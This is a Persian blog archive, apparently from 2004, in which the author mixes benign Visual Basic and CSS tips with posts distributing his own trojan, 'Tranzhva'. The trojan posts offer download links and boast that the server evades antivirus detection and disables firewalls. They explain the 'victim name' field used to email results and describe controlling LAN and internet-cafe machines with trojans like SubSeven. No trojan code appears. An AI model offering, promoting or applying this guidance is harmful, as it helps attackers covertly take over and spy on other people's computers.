عجب مشکلاتی داریم!

عجب مشکلاتی داریم!

بابا عجب مشکلاتی داریم ما با این ترانژوا! هر جا که Upload ش می کنیم سوتی میشه. توی هاست خودم که نمی تونم بریزم. چون آنتی ویروس دارن و اتوماتیک ترانژوا پاک میشه. توی FreeHost هم ریختیم که هک شد! توی Sharemation هم که ریختم بعضی وقتا Down میشه. توی 20M.com هم که اصلا دانلودش نمیشه کرد! حالا مجبور شدم بریزم توی Geocities .

 

Download from Geocities

Download from Sharemations

 

اگر از اینجا هم نتونستید دانلودش کنید بگید که من یه فکر اساسی تر بکنم.

 

  
نویسنده : محمد ; ساعت ٤:۱٠ ‎ب.ظ روز دوشنبه ٢٩ دی ،۱۳۸٢

دو روش برای بیرون دادن CD Drive

دو روش برای بیرون دادن CD Drive

روش اول با استفاده از API:

 

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long

 

Call mciSendString("Set CDAudio Door Open", vbNullString, 0, 0)

 

و برای بستن آن:

Call mciSendString("Set CDAudio Door Closed", vbNullString, 0, 0)

 

روش دوم با استفاده از WindowsMediaPlayer:

 

Dim oWMP As Object , colCDROMs As Object , I As Integer

Set oWMP = ("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

If colCDROMs.Count >= 1 Then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next i

End If

در این روش کلیه ی CD Drive هاي موجود در کامپیوتر Eject می شوند.

 

  
نویسنده : محمد ; ساعت ۱:٢۱ ‎ق.ظ روز یکشنبه ٢۸ دی ،۱۳۸٢

عوض کردن رنگ ScrollBar ها در یک صفحه وب

عوض کردن رنگ ScrollBar ها در یک صفحه وب

برای این کار باید از CSS استفاده کنید.

یک نمونه:

<style>

BODY

{

      SCROLLBAR-FACE-COLOR: creame;

      SCROLLBAR-HIGHLIGHT-COLOR: white;

      SCROLLBAR-SHADOW-COLOR: 34323;

      SCROLLBAR-ARROW-COLOR: black;

      SCROLLBAR-TRACK-COLOR: white;

      SCROLLBAR-DARKSHADOW-COLOR: white;

}

</style>

این کدها را باید در قسمت <head> بنویسید.

 

 

  
نویسنده : محمد ; ساعت ٦:٠٤ ‎ب.ظ روز چهارشنبه ٢٤ دی ،۱۳۸٢

مشکلات Host

مشکلات Host

متاسفانه برنامه ي ترانژوا از توی هاست من پاک شد و من مجبور شدم دوباره Upload ش کنم.

 

Download Now

در ضمن  Server  اون هنوز توسط آنتی ویروس شناسايی نشده.

  
نویسنده : محمد ; ساعت ٢:٤۱ ‎ب.ظ روز چهارشنبه ٢٤ دی ،۱۳۸٢

گذاشتن تصویر برای منوها در VB با استفاده از ImageList

گذاشتن تصویر برای منوها در VB با استفاده از ImageList

ويژوال بیسیک به طور پیش فرض توانايي گذاشتن تصویر برای منوها را ندارد. لذا برای این کار باید از توابع API استفاده کرد.

در این مثال، تصویرها را درون یک ImageList ذخیره کرده ایم. که این تصویرها باید Bitmap باشند.

ابتدا API ها:

Public Declare Function GetMenu Lib "user32" (ByVal hwnd As Long) As Long

Public Declare Function GetSubMenu Lib "user32" (ByVal hMenu As Long, ByVal nPos As Long) As Long

Public Declare Function GetMenuItemID Lib "user32" (ByVal hMenu As Long, ByVal nPos As Long) As Long

Public Declare Function SetMenuItemBitmaps Lib "user32" (ByVal hMenu As Long, ByVal nPosition As Long, ByVal wFlags As Long, ByVal hBitmapUnchecked As Long, ByVal hBitmapChecked As Long) As Long

Public Const MF_BITMAP = &H4&

Public Const MF_BYPOSITION = &H400&

با استفاده از تابع زیر، برای منوهاي دلخواه تصویر می گذاریم:

 

Public Sub SetMenuBitmap(ByVal MenuBarItem As Long, MenuItem As Long, ByVal Bitmap As IPictureDisp)

Dim n1 As Long, n2 As Long

n1 = GetMenu(Form1.hwnd)

n2 = GetSubMenu(n1, MenuBarItem)

Call SetMenuItemBitmaps(n2, MenuItem, MF_BYPOSITION, Bitmap.Handle, Bitmap.Handle)

End Sub

پارامترهایی که این تابع می گیرد، یکی شماره ی منوی مورد نظر در نوار منو، و دیگری شماره آيتم منو. و پارامتر آخری هم تصویر مورد نظر است.

مثال:

Call SetMenuBitmap(0, 0, ImageList1.ListImages(1).Picture)

نکته ای که وجود دارد این است که در توابع API، شماره ی منوها به جاي این که از 1 شروع شود، از صفر شروع می شود.

در اینجا ما براي آيتم اول از منوي اول برنامه تصویر گذاشته ایم. که این تصویر، تصویر اول در ImageList است.

 

Source Code Download

 

  
نویسنده : محمد ; ساعت ٧:٥٦ ‎ب.ظ روز دوشنبه ٢٢ دی ،۱۳۸٢

به دست آوردن متن پنجره ی فعال

به دست آوردن متن پنجره ی فعال

 

باید ابتدا دستگیره ی پنجره ی فعال را به وسیله ی GetForegroundWindow به دست بیاریم. و بعد از اون، بوسیله ی  تابعGetWindowText ، متنش رو به دست بیاریم.

 

این کدها را درون Module بریزید:

 

Public Declare Function GetForegroundWindow Lib "user32" Alias "GetForegroundWindow" () As Long

Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

 

یک تایمر و یک کادر متن روی فرم بگذارید و این کدها را درون Timer1_Timer بنویسید:

 

Private Sub Timer1_Timer()

Dim Buffer As String * 1024

Dim LenBuf As Long

Dim FWindow As Long

LenBuf = Len(Buffer)

Buffer = String$(LenBuf, Chr(0))

FWindow = GetForegroundWindow

Call GetWindowText(FWindow, Buffer, LenBuf)

Text1.Text = Buffer

End Sub

وقتی برنامه رو اجرا کنید، درون کادر متن، تیتر پنجره ی فعال نمایش داده خواهد شد.

 

Source Code Download

  
نویسنده : محمد ; ساعت ٢:۱٩ ‎ب.ظ روز شنبه ٢٠ دی ،۱۳۸٢

کار با فايلها در VB با استفاده از توابع API

کار با فايلها در VB با استفاده از توابع API

براي خواندن فايلها در VB، از دستور Open استفاده مي کرديم. اما در مورد فايلهاي باينري، اين دستور با مشکلاتي مواجه بود.

اکنون با استفاده از توابع API مخصوص خواندن فايل، مي توانيم فايلها را راحتتر بخوانيم.

توابعي که مي خواهيم از آنها استفاده کنيم به شرح زير هستند:

_lopen

_lread

_lcreat

_lwrite

_lclose

که از اسمشان معلوم است که چه کاري انجام مي دهند.

ابتدا بايد آنها را Declare کنيم:

Public Declare Function lread Lib "kernel32" Alias "_lread" (ByVal hFile As Long, lpBuffer As Any, ByVal wBytes As Long) As Long

Public Declare Function lclose Lib "kernel32" Alias "_lclose" (ByVal hFile As Long) As Long

Public Declare Function lopen Lib "kernel32" Alias "_lopen" (ByVal lpPathName As String, ByVal iReadWrite As Long) As Long

Public Declare Function lcreat Lib "kernel32" Alias "_lcreat" (ByVal lpPathName As String, ByVal iAttribute As Long) As Long

Public Declare Function lwrite Lib "kernel32" Alias "_lwrite" (ByVal hFile As Long, ByVal lpBuffer As String, ByVal wBytes As Long) As Long

Public Declare Function llseek Lib "kernel32" Alias "_llseek" (ByVal hFile As Long, ByVal lOffset As Long, ByVal iOrigin As Long) As Long

Public Const OF_READ = &H0

Public Const OF_WRITE = &H1

Public Const OF_READWRITE = &H2

نکته اي که در اينجا مطرح است اين است که چون اين توابع با Underline شروع مي شوند، در VB بايد يک اسم جديد به آنها داد. (Alias) که ما در اينجا تابع _lopen را با نام lopen مي شناسيم.

 

حال نحوه ي استفاده از اين توابع.

اگر بخواهيم از فايلي بخوانيم يا در فايلي بنويسيم، بايد ابتدا آن را باز کنيم. بدين صورت:

Dim hFile As Long

hFile = lopen(Filename  , OpenMode)

که به جاي Filename، فايلي که مي خواهيم آن را باز کنيم مي نويسيم و به جاي OpenMode يکي از مقادير زير:

OF_READ

OF_WRITE

OF_READWRITE

را مي گذاريم که عملکرد آنها نيز مشخص است:

مثال:

Dim Filename As String

Dim hFile As Long

Filename = "C:\Autoexec.bat"

hFile = lopen(Filename , OF_READ)

در اينجا ما فايل C:\Autoexec.bat را در حالت خواندن باز کرديم.

براي دسترسي به اين فايل که باز کرديم، بايد از Handle (دستگيره) ي فايل استفاده کنيم. که در اينجا پس از فراخواني lopen، دستگيره ي فايل داخل متغير hFile قرار مي گيرد.

حال که فايل را باز کرديم، بايد از آن بخوانيم:

Dim Numread As Long

Dim Buffer As String * 1024

Numread = lread(hFile , Buffer , Len(Buffer))

در اينجا 1024 بايت از فايل خوانده شده و در داخل متغير Buffer قرار مي گيرد.

تابع _lread بدين صورت است که ما تعيين مي کنيم که چه مقدار مي خواهيم بخوانيم و همچنين حافظه اي که مي خواهيم اطلاعات خوانده شده در آن قرار گيرد را مشخص مي کنيم. و بعد از احضار تابع _lread، مقدار واقعي خوانده شده از فايل، داخل متغير Numread قرار مي گيرد.

اين در موقعي اتفاق مي افتد که به پايان فايل رسيده باشيم. به عنوان مثال 800 بايت از فايل باقي مانده در حالي که ما گفته ايم که مي خواهيم 1024 بايت بخوانيم. در اينجا متغير Numread برابر 800 خواهد شد.

 

 

  
نویسنده : محمد ; ساعت ٥:۱٩ ‎ب.ظ روز سه‌شنبه ۱٦ دی ،۱۳۸٢

تبادل لینک

تبادل لینک

آقاي EhsanFA  به من لینک داده بودند و من هم امروز لینکشون رو گذاشتم.

شما هم اگر مایل باشید تبادل لینک می کنیم.

 

 

  
نویسنده : محمد ; ساعت ٢:٥۸ ‎ب.ظ روز سه‌شنبه ۱٦ دی ،۱۳۸٢

استفاده از تروجانها در شبکه هاي محلي

استفاده از تروجانها در شبکه هاي محلي

 

تروجانها علاوه بر اين که مي توانند در دو کامپيوتر مجزاي متصل به اينترنت کار کنند، در کامپيوترهاي داخلي يک شبکه ي محلي (LAN) نيز مي توانند کار کنند. يعني کامپيوترهاي شبکه محلي نيز مي توانند از طريق کامپيوترهاي ديگر موجود در همان شبکه، توسط يک تروجان کنترل شوند.

بدين منظور شما ابتدا بايد Server تروجان (Tranzhva , SubSeven , ...)  را در کامپيوتري که مي خواهيد کنترلش کنيد، اجرا کنيد. بعد از اجراي آن، با داشتن IP آن کامپيوتر، مي توان از کامپيوترهاي ديگر آن را کنترل کرد. به عنوان مثال:

192.168.0.2

همچنين اين امکان نيز وجود دارد که چندين کامپيوتر را از يک کامپيوتر کنترل کرد. براي اين منظور بايد Server در تک تک کامپيوترهاي مورد نظر شما اجرا شده باشد.

 

يک نکته ي مهم

سوالي که در اينجا پيش مي آيد اين است که آيا به وسيله ي يک کامپيوتر خارج از LAN، مي توان کامپيوترهاي درون يک LAN را کنترل کرد؟

در جواب بايد گفت که اين کار فقط براي کامپيوتر مرکزي LAN يعني Gateway امکان پذير است. در LAN، کامپيوتر مرکزي به اينترنت متصل مي شود و با متصل شدن خود، کامپيوترهاي ديگر را نيز به اينترنت متصل مي کند، اما فقط خود اين کامپيوتر داراي يک IP مجزا در اينترنت است.

به عنوان مثال در يک کافي نت، چهار کامپيوتر وجود دارند که يکي از آنها به وسيله ي مودم به اينترنت وصل است و بقيه از طريق LAN وصل هستند و از اينترنت کامپيوتر مرکزي استفاده مي کنند. چنانچه Server يک تروجان در کامپيوتر مرکزي اجرا شده باشد، از کامپيوتري خارج از کافي نت، مي توان آن را کنترل کرد. ولي چنانچه Server در کامپيوتر ديگري غير از کامپيوتر مرکزي اجرا شده باشد، امکان کنترل آن کامپيوتر توسط کامپيوتري خارج از کافي نت وجود ندارد.

 

 

  
نویسنده : محمد ; ساعت ٤:٢۱ ‎ب.ظ روز جمعه ۱٢ دی ،۱۳۸٢

دزدي تو روز روشن!

دزدي تو روز روشن!

 

يک نفر دزد پيدا شده که مي خواد برنامه ي Tranzhva رو Edit کنه و به اسم خودش بده بيرون و بفروشه!

آدرس وبلاگش اينه:

http://reezza.persianblog.ir/

 

در ضمن بايد گفت که اين دزد بي چشم و رو، هيچ چيزي از API و Socket Programming نمي دونه و فقط بلده Edit کنه!

و اين طوري که خودش مي گفت، ميخواد برنامه رو به قيمت 40 دلار بفروشه.

من به عنوان نويسنده ي اين برنامه، به شما توصيه مي کنم که به هيچ عنوان این نرم افزار رو  نخريد چون همون Tranzhva 1.0 هست که فقط اسم من روش نيست. و هيچ چيز اضافه بر Tranzhva نداره.

درواقع اگر بخريد پول خودتونو دور ريختين و به یک دزد کمک کردین.

 

به نظر شما اسم این کار به جز دزدی چه می تونه باشه؟

 

 

 

  
نویسنده : محمد ; ساعت ۳:٥٦ ‎ب.ظ روز سه‌شنبه ٩ دی ،۱۳۸٢

اشکال در Server3

اشکال در Server3

يک اشکال در Server3 وجود داشت که هم اکنون رفع شده است.

اشکال آن اين بود که آيکون Server پس از زدن SaveServerAs نشان داده نمي شد.

از همون لينک قبلي مي تونيد دانلود کنيد

Download Now

  
نویسنده : محمد ; ساعت ۳:۱۸ ‎ب.ظ روز سه‌شنبه ٩ دی ،۱۳۸٢

Server Update 3

Server Update 3

سومين نسخه از Server هم اکنون آماده ي دانلود شدن است.

در اين نسخه تعدادي از اشکال ها رفع شده است.

که مهمترين آنها، پوکيدن Server هنگام دانلود فايل از کامپيوتر طرف است. در Server2، هنگامي که مي خواستيد از کامپيوتر طرف فايل دانلود کنيد، وقتي به انتهاي فايل مي رسيد، پيام خطاي Asynchronous Socket Error مي آمد و Server از کار مي افتاد.

هم اکنون اين مشکل حل شده است.

مشکل ديگري که Server2 داشت، کم بودن سرعت دانلود فايلها بود. که در Server3 اين سرعت به حدود 3 برابر رسيده است.

همچنين Server3 نيز توسط آنتي ويروس شناسايي نمي شود.

در ضمن شما بايد اسم در اسم قرباني (Victim Name) از کاراکتر Space استفاده نکنيد. چون ايميل براتون ارسال نميشه. (اين مشکلي است که براي خيلي ها پيش اومده)

 

Download Now

 

  
نویسنده : محمد ; ساعت ٧:٥۸ ‎ب.ظ روز دوشنبه ۸ دی ،۱۳۸٢

جواب به یک سوال

جواب به یک سوال

سلام. اولاْ چطوری میشه آیکون فایل سرور رو عوض کرد؟ از این فایل سرور با این آیکون که شما گذاشتید نمیشه همه جا ازش استفاده کرد. دوماْ شما گفتید ترانژوا آنتی ویروس و فایروال رو از کار میندازه. ‍پس چطوری میشه باهاش مقابله کرد؟

 

جواب: در نسخه ی بعدی ترانژوا این قابلیت نیز افزوده خواهد شد.

در مورد سوال دوم هم منظورتون اینه که چه جوری با Server مقابله کنید؟

اگر منظورتون اینه، در نسخه ی بعدی این امکان گذاشته خواهد شد که شما تعیین کنید که آیا فایروالها و آنتی ویروس رو از کار بندازه یا نه.

 

 

  
نویسنده : محمد ; ساعت ۱۱:٤٠ ‎ق.ظ روز شنبه ٦ دی ،۱۳۸٢

و باز هم فکر غلط!

و باز هم فکر غلط!

ما کارمون شده این که بیایم فکرهای غلط رو به همه بگیم. باشد که همگان روشن گردند!  :D :P

یک فکر غلط دیگه هم که به ذهن بعضی ها (ایندفعه تعدادشون کمتره) می رسه اینه که با استفاده از Client یک تروجان، به Server یک تروجان دیگر Connect بشن.

به عنوان مثال از من سوال کرده بودند که چرا با SubSeven نمیشه به Server ترانژوا Connect شد؟

در جواب باید گفت که این کار هم غیرممکن است.

این کار مثل این می مونه که شما بخوای روی یک ماشین پیکان، لاستیک کامیون بذاری!!! :))

خوب معلومه که به هم نمی خورن!

بر عکسش هم همینطور. با Tranzhva نیز نمیشه به Sub7 وصل شد.

 

 

  
نویسنده : محمد ; ساعت ٩:۳٩ ‎ب.ظ روز سه‌شنبه ٢ دی ،۱۳۸٢

طرف کجاست؟

طرف کجاست؟

با استفاده از IP طرف، تا حدودی می توان فهمید که آیا طرف در ایران است یا خیر.

چنین IP هایی مخصوص ایران هستند:

217.218…

217.219…

213.217…

62.217…

80.242…

و 216 هم مال آمریکا است.

 

 

  
نویسنده : محمد ; ساعت ۳:٢٩ ‎ب.ظ روز دوشنبه ۱ دی ،۱۳۸٢